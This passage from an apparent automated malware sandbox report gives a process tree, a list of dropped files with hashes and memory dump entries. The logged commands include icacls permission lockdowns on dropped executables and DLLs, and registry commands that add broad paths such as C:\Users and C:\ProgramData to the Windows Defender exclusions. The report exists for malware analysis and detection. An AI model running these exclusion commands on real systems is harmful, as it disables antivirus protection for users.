                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3420
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:2496
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3528
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                PID:3116
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\lDQbO9.exe" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:64
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\image.png" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                PID:2528
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\image.png" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4412
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:2192
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2032
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:4584
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2580
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                PID:1356
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3448
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                PID:2912
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3996
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                PID:4540
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4340
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3288
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2376
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                PID:4116
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3460
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                PID:1656
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\lDQbO9\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:2980
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\kC79lR" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1112
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\kC79lR" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:4964
                          • C:\Windows\system32\cmd.exe
                            cmd.exe
                            1⤵
                              PID:1664
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:3192
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:3528
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:3132
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:3792
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:4864
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:2860
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:1668
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:696
                            • C:\Program Files (x86)\lDQbO9\lDQbO9.exe
                              "C:\Program Files (x86)\lDQbO9\lDQbO9.exe"
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:4092
                            • C:\Program Files (x86)\lDQbO9\lDQbO9.exe
                              "C:\Program Files (x86)\lDQbO9\lDQbO9.exe"
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:752
                            • C:\Program Files (x86)\5yzS2yE\8pRZ3u.exe
                              "C:\Program Files (x86)\5yzS2yE\8pRZ3u.exe"
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:4912
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              PID:4720
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:4092
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              PID:1268
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:4844

                            Network

                                  MITRE ATT&CK Enterprise v16

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  e58ef6d.rbs

                                  • Path C:\Config.Msi\e58ef6d.rbs
                                  • Size 7KB
                                  • SHA256 7b2e7335e98ac5cbc9be07d2af04071983c86cc493f1d07db334a266ebb97e4d
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  XPSPLOG.dll

                                  • Path C:\Program Files (x86)\5yzS2yE\XPSPLOG.dll
                                  • Size 4.6MB
                                  • SHA256 3479a91f00f4099c154de352d120d6d2dbccb78d62e2c7e5e620e41e265b14e6
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  image.png

                                  • Path C:\Program Files (x86)\5yzS2yE\image.png
                                  • Size 4.9MB
                                  • SHA256 e99c5be2b5c7f80617fe40d6e02444fb26acb44a14992716453fa94c7b909f3d
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  XPSPLOG.dll

                                  • Path C:\Program Files (x86)\lDQbO9\XPSPLOG.dll
                                  • Size 4.6MB
                                  • SHA256 eea9bac62dcfbea186e69174a6426a661e9b5d0e6e20bf60f030dbd71bef97fe
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  image.png

                                  • Path C:\Program Files (x86)\lDQbO9\image.png
                                  • Size 4.9MB
                                  • SHA256 5c88846d55e906b66e6ec90b3f7e6b68eb53646fd4cfcb642118be0b9cfc0eee
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  lDQbO9.exe

                                  • Path C:\Program Files (x86)\lDQbO9\lDQbO9.exe
                                  • Size 145KB
                                  • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  thumbs.db

                                  • Path C:\Program Files (x86)\lDQbO9\thumbs.db
                                  • Size 358KB
                                  • SHA256 b93833cba15568bebe51a8e67270ac8a95b04e4512cf0d8f18fa20b70481106f
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  __PSScriptPolicyTest_r1cdl3ex.wkw.ps1

                                  • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1cdl3ex.wkw.ps1
                                  • Size 60B
                                  • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                  • MD5 SHA1 SHA512 TLSH

                                  destopbak.ini

                                  • Path C:\Users\Public\Music\destopbak.ini
                                  • Size 2B
                                  • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                  • MD5 SHA1 SHA512

                                  UxEnhance64.dll

                                  • Path C:\Users\Public\kC79lR\UxEnhance64.dll
                                  • Size 3.1MB
                                  • SHA256 f21961a2a5241e261d32d4a718cf7c84f9b0e44ab23336f00bd4a08c3fb00c20
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  W4N9eg.exe

                                  • Path C:\Users\Public\kC79lR\W4N9eg.exe
                                  • Size 135KB
                                  • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  adoresd.dat

                                  • Path C:\Users\Public\kC79lR\adoresd.dat
                                  • Size 4.8MB
                                  • SHA256 5136c94283f6c4efae4291b5fbe110c9433c642d3494a64063a6d78ff42e72b5
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  msadox.tb

                                  • Path C:\Users\Public\kC79lR\msadox.tb
                                  • Size 8KB
                                  • SHA256 0f997c290687bffbb393691b24563816471c0ca12f4bf6270c161be0ef9cd7f4
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  MSIF0F4.tmp

                                  • Path C:\Windows\Installer\MSIF0F4.tmp
                                  • Size 5.8MB
                                  • SHA256 d9a82faff6c4babb4525dd27b78cf57c8a597596145527fadc096461f2d485f3
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  e58ef6c.msi

                                  • Path C:\Windows\Installer\e58ef6c.msi
                                  • Size 5.9MB
                                  • SHA256 2c1e750f0de09fc53ad94a1f408ecaf598f1d356869d15ec33bb71bcd87b83ba
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  metadata-2

                                  • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                  • Size 24.1MB
                                  • SHA256 46dd905c11323768da63eef5082291b283cab4b535373e73a2aa89551ba138f9
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  {2cd6e7ae-e372-40e0-ae1f-95c641aa33f0}_OnDiskSnapshotProp

                                  • Path \??\Volume{73216430-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{2cd6e7ae-e372-40e0-ae1f-95c641aa33f0}_OnDiskSnapshotProp
                                  • Size 6KB
                                  • SHA256 af9056abdf84a2a0551a3427d785fed7d5760f923908ac5c840f0f98860b2e85
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  xxxx.ini

                                  • Path \??\c:\xxxx.ini
                                  • Size 2B
                                  • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                  • MD5 SHA1 SHA512

                                  memory/648-75-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-97-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-77-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-78-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-82-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-89-0x0000027DC03C0000-0x0000027DC044A000-memory.dmp

                                  memory/648-91-0x0000027DC03C0000-0x0000027DC044A000-memory.dmp

                                  memory/648-90-0x0000027DC03C0000-0x0000027DC044A000-memory.dmp

                                  memory/648-88-0x0000027DC03C0000-0x0000027DC044A000-memory.dmp

                                  memory/648-96-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-87-0x0000027DBEAD0000-0x0000027DBEB1E000-memory.dmp

                                  memory/648-76-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-70-0x00007FF8AE540000-0x00007FF8AE542000-memory.dmp

                                  memory/648-71-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-68-0x0000027DC0EA0000-0x0000027DC175E000-memory.dmp

                                  memory/648-62-0x00007FF8AE530000-0x00007FF8AE532000-memory.dmp

                                  memory/648-63-0x00007FF890410000-0x00007FF89092E000-memory.dmp

                                  memory/676-48-0x00007FF89F330000-0x00007FF89F340000-memory.dmp

                                  memory/676-16-0x00007FF89F330000-0x00007FF89F340000-memory.dmp

                                  memory/676-13-0x00007FF8902D0000-0x00007FF890908000-memory.dmp

                                  memory/676-12-0x00007FF8AE530000-0x00007FF8AE532000-memory.dmp

                                  memory/752-262-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

                                  memory/752-270-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                  memory/752-263-0x0000000003540000-0x0000000003D29000-memory.dmp

                                  memory/752-242-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                  memory/752-244-0x0000000074EB0000-0x00000000755FA000-memory.dmp

                                  memory/752-249-0x0000000003540000-0x0000000003D29000-memory.dmp

                                  memory/1984-308-0x0000000006E60000-0x0000000006E7E000-memory.dmp

                                  memory/1984-310-0x0000000007800000-0x0000000007E7A000-memory.dmp

                                  memory/1984-285-0x0000000005090000-0x00000000056B8000-memory.dmp

                                  memory/1984-286-0x0000000004F00000-0x0000000004F22000-memory.dmp

                                  memory/1984-287-0x0000000005730000-0x0000000005796000-memory.dmp

                                  memory/1984-313-0x0000000007440000-0x00000000074D6000-memory.dmp

                                  memory/1984-312-0x0000000007230000-0x000000000723A000-memory.dmp

                                  memory/1984-300-0x0000000072BA0000-0x0000000072BEC000-memory.dmp

                                  memory/1984-293-0x0000000005850000-0x00000000058B6000-memory.dmp

                                  memory/1984-309-0x0000000006E80000-0x0000000006F23000-memory.dmp

                                  memory/1984-314-0x00000000073C0000-0x00000000073D1000-memory.dmp

                                  memory/1984-284-0x00000000028B0000-0x00000000028E6000-memory.dmp

                                  memory/1984-311-0x00000000071C0000-0x00000000071DA000-memory.dmp

                                  memory/1984-299-0x0000000006460000-0x0000000006492000-memory.dmp

                                  memory/1984-298-0x0000000005F40000-0x0000000005F8C000-memory.dmp

                                  memory/1984-297-0x0000000005EA0000-0x0000000005EBE000-memory.dmp

                                  memory/1984-296-0x0000000005AD0000-0x0000000005E24000-memory.dmp

                                  memory/4092-272-0x0000000001080000-0x0000000001081000-memory.dmp

                                  memory/4092-265-0x00000000010B0000-0x00000000010B1000-memory.dmp

                                  memory/4092-266-0x00000000036C0000-0x0000000003EA9000-memory.dmp

                                  memory/4092-246-0x00000000036C0000-0x0000000003EA9000-memory.dmp

                                  memory/4092-236-0x0000000001080000-0x0000000001081000-memory.dmp

                                  memory/4092-237-0x0000000074EB0000-0x00000000755FA000-memory.dmp

                                  memory/4252-192-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-204-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-181-0x0000000074EB0000-0x00000000755FA000-memory.dmp

                                  memory/4252-189-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-180-0x00000000012A0000-0x00000000012A1000-memory.dmp

                                  memory/4252-185-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-199-0x0000000002F50000-0x0000000002F64000-memory.dmp

                                  memory/4252-230-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-208-0x0000000010000000-0x0000000010061000-memory.dmp

                                  memory/4252-282-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4252-187-0x00000000015A0000-0x00000000015A1000-memory.dmp

                                  memory/4252-231-0x0000000003970000-0x0000000004159000-memory.dmp

                                  memory/4912-280-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

                                  memory/4912-255-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

                                  memory/4912-260-0x00000000035E0000-0x0000000003DC9000-memory.dmp

                                  memory/4912-277-0x00000000035E0000-0x0000000003DC9000-memory.dmp

                                  memory/4912-276-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

                                  memory/4912-256-0x0000000072B60000-0x00000000732AA000-memory.dmp